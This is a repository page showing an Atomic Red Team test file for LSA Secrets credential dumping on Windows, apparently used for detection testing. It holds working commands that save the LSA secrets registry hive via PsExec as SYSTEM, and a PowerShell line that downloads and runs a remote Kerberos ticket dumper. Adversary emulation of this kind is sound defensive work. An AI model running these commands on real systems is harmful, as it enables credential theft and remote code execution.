security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
atomic-red-team/atomics/T1003.004/T1003.004.yaml
T
Atomic Red Team doc generator 79b9d83734 Generated docs from job=generate-docs branch=master [ci skip]
2024-07-05 17:33:31 +00:00

49 lines
2.6 KiB
YAML
Raw Permalink Blame History

attack_technique: T1003.004
display_name: "OS Credential Dumping: LSA Secrets"
atomic_tests:
- name: Dumping LSA Secrets
auto_generated_guid: 55295ab0-a703-433b-9ca4-ae13807de12f
description: |
Dump secrets key from Windows registry
When successful, the dumped file will be written to $env:Temp\secrets.
Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information.
https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%20Secrets%20is%20a%20registry,host%2C%20local%20security%20policy%20etc.
supported_platforms:
- windows
input_arguments:
psexec_exe:
description: Path to PsExec executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\T1003.004\bin\PsExec.exe
dependency_executor_name: powershell
dependencies:
- description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe})
prereq_command: 'if (Test-Path "#{psexec_exe}") {exit 0} else {exit 1}'
get_prereq_command: |-
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PSTools.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PSTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\PSTools" -Force
New-Item -ItemType Directory (Split-Path "#{psexec_exe}") -Force | Out-Null
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PSTools\PsExec.exe" "#{psexec_exe}" -Force
executor:
command: |
"#{psexec_exe}" -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y
cleanup_command: del %temp%\secrets >nul 2> nul
name: command_prompt
elevation_required: true
- name: Dump Kerberos Tickets from LSA using dumper.ps1
auto_generated_guid: 2dfa3bff-9a27-46db-ab75-7faefdaca732
description: |
This tool allows you to dump Kerberos tickets from the LSA cache. Implemented via Add-Type.
If the tool is run as a privileged user, it will automatically obtain NT AUTHORITY\SYSTEM privileges and then dump all tickets. If the tool is run as a non-privileged user, it will only dump tickets from the current logon session.
Ref: https://github.com/MzHmO/PowershellKerberos/
Author of dumper.ps1: Michael Zhmaylo (@MzHmO)
supported_platforms:
- windows
executor:
command: |
Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/MzHmO/PowershellKerberos/beed52acda37fc531ef0cb4df3fc2eb63a74bbb8/dumper.ps1')
name: powershell
elevation_required: true
Reference in New Issue View Git Blame Copy Permalink